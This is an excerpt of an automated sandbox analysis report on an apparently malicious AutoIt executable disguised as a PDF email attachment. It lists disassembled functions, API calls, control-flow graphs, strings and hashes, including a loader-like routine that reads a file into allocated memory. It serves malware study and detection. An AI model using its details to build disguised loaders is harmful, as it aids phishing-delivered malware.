                                                                                                          • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 007B9452
                                                                                                          • _wcsncpy.LIBCMT ref: 007B94C5
                                                                                                          • DeleteFileW.KERNEL32(?,?), ref: 007B94FB
                                                                                                          • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 007B9511
                                                                                                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 007B9522
                                                                                                          • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 007B9534
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                                                                          • String ID:
                                                                                                          • API String ID: 1500180987-0
                                                                                                          • Opcode ID: c59ef068977e3aff8661775f1340b30dfa53578152f6fc8729b892b229b6a861
                                                                                                          • Instruction ID: 0ede02df348552511382f57f585f22cacd97ff77af80d50ea4c3dc1d1a2cec52
                                                                                                          • Opcode Fuzzy Hash: c59ef068977e3aff8661775f1340b30dfa53578152f6fc8729b892b229b6a861
                                                                                                          • Instruction Fuzzy Hash: D8C14CB1D00219AADF21DFA5CC89ADEB7BCEF45300F0040AAF609E7141DB789A858F65
                                                                                                          Function 0075301C Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 73windowregistryCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 00753074
                                                                                                          • RegisterClassExW.USER32(00000030), ref: 0075309E
                                                                                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 007530AF
                                                                                                          • InitCommonControlsEx.COMCTL32(?), ref: 007530CC
                                                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 007530DC
                                                                                                          • LoadIconW.USER32(000000A9), ref: 007530F2
                                                                                                          • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00753101
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                          • API String ID: 2914291525-1005189915
                                                                                                          • Opcode ID: 8cde020b73bcee8bbc808501bb263c286305945dd7894fa624d3882c299660dd
                                                                                                          • Instruction ID: 6ff89c88b3da8b546a2209ac452c10d5b3a01d4931aed2234740f0d6b3415fad
                                                                                                          • Opcode Fuzzy Hash: 8cde020b73bcee8bbc808501bb263c286305945dd7894fa624d3882c299660dd
                                                                                                          • Instruction Fuzzy Hash: C63105B1901309EFDB008FA4EC89ADEBBF4FF09321F14812AE551E62A0D3B90645CF95
                                                                                                          Function 00753A46 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 71windowregistryCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 00753A50
                                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 00753A5F
                                                                                                          • LoadIconW.USER32(00000063), ref: 00753A76
                                                                                                          • LoadIconW.USER32(000000A4), ref: 00753A88
                                                                                                          • LoadIconW.USER32(000000A2), ref: 00753A9A
                                                                                                          • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00753AC0
                                                                                                          • RegisterClassExW.USER32(?), ref: 00753B16
                                                                                                            • Part of subcall function 00753041: GetSysColorBrush.USER32(0000000F), ref: 00753074
                                                                                                            • Part of subcall function 00753041: RegisterClassExW.USER32(00000030), ref: 0075309E
                                                                                                            • Part of subcall function 00753041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 007530AF
                                                                                                            • Part of subcall function 00753041: InitCommonControlsEx.COMCTL32(?), ref: 007530CC
                                                                                                            • Part of subcall function 00753041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 007530DC
                                                                                                            • Part of subcall function 00753041: LoadIconW.USER32(000000A9), ref: 007530F2
                                                                                                            • Part of subcall function 00753041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00753101
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                          • String ID: #$0$AutoIt v3$Pm
                                                                                                          • API String ID: 423443420-4097620050
                                                                                                          • Opcode ID: d2e3722d2bc98e48a83b977e95bfc1d33cd69c0e7a213548f85b93273a69c6dd
                                                                                                          • Instruction ID: 1151941688972536eb8bdac508ec3577ef06baaae6daa5d7552279cd72d164d2
                                                                                                          • Opcode Fuzzy Hash: d2e3722d2bc98e48a83b977e95bfc1d33cd69c0e7a213548f85b93273a69c6dd
                                                                                                          • Instruction Fuzzy Hash: 4A214872D01308EFEB10DFA4EC19BDD7BB9FB48721F00812AF504A62A1D3B956548F84
                                                                                                          Function 00753041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          • GetSysColorBrush.USER32(0000000F), ref: 00753074
                                                                                                          • RegisterClassExW.USER32(00000030), ref: 0075309E
                                                                                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 007530AF
                                                                                                          • InitCommonControlsEx.COMCTL32(?), ref: 007530CC
                                                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 007530DC
                                                                                                          • LoadIconW.USER32(000000A9), ref: 007530F2
                                                                                                          • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00753101
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                          • API String ID: 2914291525-1005189915
                                                                                                          • Opcode ID: 34f04198c8ab155990e538ceda2fdb9eb652d4eeb37a34582b4a6f116f3d8a1a
                                                                                                          • Instruction ID: 519f7754d666ee2a3a645d334dd7e5a527774040de17eb35fda99e20cb00d937
                                                                                                          • Opcode Fuzzy Hash: 34f04198c8ab155990e538ceda2fdb9eb652d4eeb37a34582b4a6f116f3d8a1a
                                                                                                          • Instruction Fuzzy Hash: FD21C3B1911618EFDB00DFA4EC89BDEBBF8FB08710F00812AF912A62A0D7B545448F95
                                                                                                          Function 0075708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                            • Part of subcall function 00754706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,,?,007537AE,?), ref: 00754724
                                                                                                            • Part of subcall function 0077050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00757165), ref: 0077052D
                                                                                                          • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 007571A8
                                                                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0078E8C8
                                                                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0078E909
                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 0078E947
                                                                                                          • _wcscat.LIBCMT ref: 0078E9A0
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                                                                          • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                          • API String ID: 2673923337-2727554177
                                                                                                          • Opcode ID: 2dcd656f537bc68dc1466973ead1ff2c4693c4c686c817d3dae2490912fbb6a5
                                                                                                          • Instruction ID: c1df7ad6f83ac984d6dc260274d87001e5a89095dbd096c4f08ded7caf09f491
                                                                                                          • Opcode Fuzzy Hash: 2dcd656f537bc68dc1466973ead1ff2c4693c4c686c817d3dae2490912fbb6a5
                                                                                                          • Instruction Fuzzy Hash: 1F718E71509301DEC704EF25E8459EBBBFCFF84350B40892EF485872A1EBB9A959CB52
                                                                                                          Function 00753633 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151windowtimeregistryCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 769 753633-753681 771 7536e1-7536e3 769->771 772 753683-753686 769->772 771->772 773 7536e5 771->773 774 7536e7 772->774 775 753688-75368f 772->775 776 7536ca-7536d2 DefWindowProcW 773->776 777 78d0cc-78d0fa call 761070 call 761093 774->777 778 7536ed-7536f0 774->778 779 753695-75369a 775->779 780 75374b-753753 PostQuitMessage 775->780 784 7536d8-7536de 776->784 812 78d0ff-78d106 777->812 785 753715-75373c SetTimer RegisterWindowMessageW 778->785 786 7536f2-7536f3 778->786 781 7536a0-7536a2 779->781 782 78d154-78d168 call 7b2527 779->782 783 753711-753713 780->783 789 753755-753764 call 7544a0 781->789 790 7536a8-7536ad 781->790 782->783 806 78d16e 782->806 783->784 785->783 791 75373e-753749 CreatePopupMenu 785->791 793 78d06f-78d072 786->793 794 7536f9-75370c KillTimer call 75443a call 753114 786->794 789->783 796 78d139-78d140 790->796 797 7536b3-7536b8 790->797 791->783 800 78d0a8-78d0c7 MoveWindow 793->800 801 78d074-78d076 793->801 794->783 796->776 811 78d146-78d14f call 7a7c36 796->811 804 7536be-7536c4 797->804 805 78d124-78d134 call 7b2d36 797->805 800->783 808 78d078-78d07b 801->808 809 78d097-78d0a3 SetFocus 801->809 804->776 804->812 805->783 806->776 808->804 813 78d081-78d092 call 761070 808->813 809->783 811->776 812->776 818 78d10c-78d11f call 75443a call 75434a 812->818 813->783 818->776
                                                                                                          APIs
                                                                                                          • DefWindowProcW.USER32(?,?,?,?), ref: 007536D2
                                                                                                          • KillTimer.USER32(?,00000001), ref: 007536FC
                                                                                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0075371F
                                                                                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0075372A
                                                                                                          • CreatePopupMenu.USER32 ref: 0075373E
                                                                                                          • PostQuitMessage.USER32(00000000), ref: 0075374D
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                          • String ID: TaskbarCreated$%~
                                                                                                          • API String ID: 129472671-4286669069
                                                                                                          • Opcode ID: da801f4a98c84499da0c85d008f87c72e8051add29f1b6942348379e0f393b7b
                                                                                                          • Instruction ID: a3fec465e4c0d715b25583e8a426a856faf58d4ce0be8abdeb09c696dd102fb5
                                                                                                          • Opcode Fuzzy Hash: da801f4a98c84499da0c85d008f87c72e8051add29f1b6942348379e0f393b7b
                                                                                                          • Instruction Fuzzy Hash: E34159B2600509EBDB206F64DC4DBFA3768FF44382F504529FD02D22B1CAEC9D499365
                                                                                                          Function 00753766 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 267COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                                                                          • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$
                                                                                                          • API String ID: 1825951767-2885450264
                                                                                                          • Opcode ID: 47da7e246018a1b9f0f9ce2b4b19e081dd2fcf951ed58e9929227f6b77d117a0
                                                                                                          • Instruction ID: 0cce08328ab7f55a1372885808bfa95c476a9bd5d1e7cd94648f6b93d2beb5d2
                                                                                                          • Opcode Fuzzy Hash: 47da7e246018a1b9f0f9ce2b4b19e081dd2fcf951ed58e9929227f6b77d117a0
                                                                                                          • Instruction Fuzzy Hash: 28A14E7291021DDACB15EBA0DC59AEEB778FF54341F44442AE816B71A1DFB86A0CCB60
                                                                                                          Function 00E84440 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 239fileCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 944 e84440-e844ee call e81e50 947 e844f5-e8451b call e85350 CreateFileW 944->947 950 e8451d 947->950 951 e84522-e84532 947->951 952 e8466d-e84671 950->952 959 e84539-e84553 VirtualAlloc 951->959 960 e84534 951->960 953 e846b3-e846b6 952->953 954 e84673-e84677 952->954 956 e846b9-e846c0 953->956 957 e84679-e8467c 954->957 958 e84683-e84687 954->958 961 e846c2-e846cd 956->961 962 e84715-e8472a 956->962 957->958 963 e84689-e84693 958->963 964 e84697-e8469b 958->964 965 e8455a-e84571 ReadFile 959->965 966 e84555 959->966 960->952 969 e846cf 961->969 970 e846d1-e846dd 961->970 971 e8473a-e84742 962->971 972 e8472c-e84737 VirtualFree 962->972 963->964 973 e846ab 964->973 974 e8469d-e846a7 964->974 967 e84578-e845b8 VirtualAlloc 965->967 968 e84573 965->968 966->952 975 e845ba 967->975 976 e845bf-e845da call e855a0 967->976 968->952 969->962 977 e846df-e846ef 970->977 978 e846f1-e846fd 970->978 972->971 973->953 974->973 975->952 984 e845e5-e845ef 976->984 980 e84713 977->980 981 e8470a-e84710 978->981 982 e846ff-e84708 978->982 980->956 981->980 982->980 985 e845f1-e84620 call e855a0 984->985 986 e84622-e84636 call e853b0 984->986 985->984 992 e84638 986->992 993 e8463a-e8463e 986->993 992->952 994 e8464a-e8464e 993->994 995 e84640-e84644 CloseHandle 993->995 996 e8465e-e84667 994->996 997 e84650-e8465b VirtualFree 994->997 995->994 996->947 996->952 997->996
                                                                                                          APIs
                                                                                                          • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00E84511
                                                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00E84737
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101778828.0000000000E81000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_e81000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateFileFreeVirtual
                                                                                                          • String ID: +M
                                                                                                          • API String ID: 204039940-1837007667
                                                                                                          • Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                                                                          • Instruction ID: f09c45b90f6954eb44df57943945dbb3193e19328852dbe671a47d4c2a169e81
                                                                                                          • Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                                                                          • Instruction Fuzzy Hash: 57A106B4E00209EBDB14DFA4C894BEEBBB5FF48304F209159E519BB2C0D7759A81DB94
                                                                                                          Function 007539D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 1075 7539d5-753a45 CreateWindowExW * 2 ShowWindow * 2
                                                                                                          APIs
                                                                                                          • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00753A03
                                                                                                          • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00753A24
                                                                                                          • ShowWindow.USER32(00000000,?,?), ref: 00753A38
                                                                                                          • ShowWindow.USER32(00000000,?,?), ref: 00753A41
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$CreateShow
                                                                                                          • String ID: AutoIt v3$edit
                                                                                                          • API String ID: 1584632944-3779509399
                                                                                                          • Opcode ID: d97d8bfc38ff4c28b96a87ecabadba6169e26f0f083d7878a411b0193abb10d3
                                                                                                          • Instruction ID: f5f667745e09626d5b8649f0f3d0d9ac546a9a508ca23a3581f857697dc59eca
                                                                                                          • Opcode Fuzzy Hash: d97d8bfc38ff4c28b96a87ecabadba6169e26f0f083d7878a411b0193abb10d3
                                                                                                          • Instruction Fuzzy Hash: 4DF0D072541690BEEA315717AC49FA72F7DEBC6F50B00812AF905E2170C5751851DA74
                                                                                                          Function 007B955B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 1076 7b955b-7b95de call 754ee5 call 7b9734 1081 7b95e8-7b9656 call 754f0b * 4 call 754ee5 call 77571c 1076->1081 1082 7b95e0 1076->1082 1096 7b965b-7b969f call 77571c call 754f0b call 7b9109 call 7b8953 1081->1096 1083 7b95e2-7b95e3 1082->1083 1085 7b972b-7b9731 1083->1085 1105 7b96a1-7b96b1 call 772d55 * 2 1096->1105 1106 7b96b6-7b96ba 1096->1106 1105->1083 1108 7b971b-7b9721 call 772d55 1106->1108 1109 7b96bc-7b9719 call 7b8b06 call 772d55 1106->1109 1116 7b9723-7b9729 1108->1116 1109->1116 1116->1085
                                                                                                          APIs
                                                                                                            • Part of subcall function 00754EE5: _fseek.LIBCMT ref: 00754EFD
                                                                                                            • Part of subcall function 007B9734: _wcscmp.LIBCMT ref: 007B9824
                                                                                                            • Part of subcall function 007B9734: _wcscmp.LIBCMT ref: 007B9837
                                                                                                          • _free.LIBCMT ref: 007B96A2
                                                                                                          • _free.LIBCMT ref: 007B96A9
                                                                                                          • _free.LIBCMT ref: 007B9714
                                                                                                            • Part of subcall function 00772D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00779A24), ref: 00772D69
                                                                                                            • Part of subcall function 00772D55: GetLastError.KERNEL32(00000000,?,00779A24), ref: 00772D7B
                                                                                                          • _free.LIBCMT ref: 007B971C
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101307476.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2101258607.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101351603.0000000000804000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101406054.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2101460697.0000000000817000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_750000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                                          • String ID:
                                                                                                          • API String ID: 1552873950-2740779761
                                                                                                          • Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                                                                          • Instruction ID: 9470386fb44729559fc8ab53471bcc042425a88997586882fe39820afac83bfe
                                                                                                          • Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                                                                          • Instruction Fuzzy Hash: AE514CB1A04218EBDF249F64CC89ADEBBB9EF48304F10449EF61DA3241DB755A91CF58
                                                                                                          Function 00E84200 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 148fileCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 1120 e84200-e8433d call e81e50 call e840f0 CreateFileW 1127 e8433f 1120->1127 1128 e84344-e84354 1120->1128 1129 e843f4-e843f9 1127->1129 1131 e8435b-e84375 VirtualAlloc 1128->1131 1132 e84356 1128->1132 1133 e84379-e84390 ReadFile 1131->1133 1134 e84377 1131->1134 1132->1129 1135 e84392 1133->1135 1136 e84394-e843ce call e84130 call e830f0 1133->1136 1134->1129 1135->1129 1141 e843ea-e843f2 ExitProcess 1136->1141 1142 e843d0-e843e5 call e84180 1136->1142 1141->1129 1142->1141
                                                                                                          APIs
                                                                                                            • Part of subcall function 00E840F0: Sleep.KERNELBASE(000001F4), ref: 00E84101
                                                                                                          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00E84333
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2101778828.0000000000E81000.00000040.00000020.00020000.00000000.sdmp, Offset: 00E81000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_e81000_PK241200518-EMAIL RELEASE-pdf.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateFileSleep
                                                                                                          • String ID: 2BME9Q1T061LR6XH
                                                                                                          • API String ID: 2694422964-1635537286
                                                                                                          • Opcode ID: 3b40e96584fc41c97b10cb6ea8402b048e8898cd35e977414ba671d9027460a3
                                                                                                          • Instruction ID: 16a42c642dcbd9145b21c6e3d4ad7efaf630c09f3e026e1dd10b9e6a1540c3b0
                                                                                                          • Opcode Fuzzy Hash: 3b40e96584fc41c97b10cb6ea8402b048e8898cd35e977414ba671d9027460a3
                                                                                                          • Instruction Fuzzy Hash: 6A517071D04249EBEF11EBA4C855BEEBBB9EF18304F004199E608BB2C1D7B91B45CB65
                                                                                                          Function 0075407C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
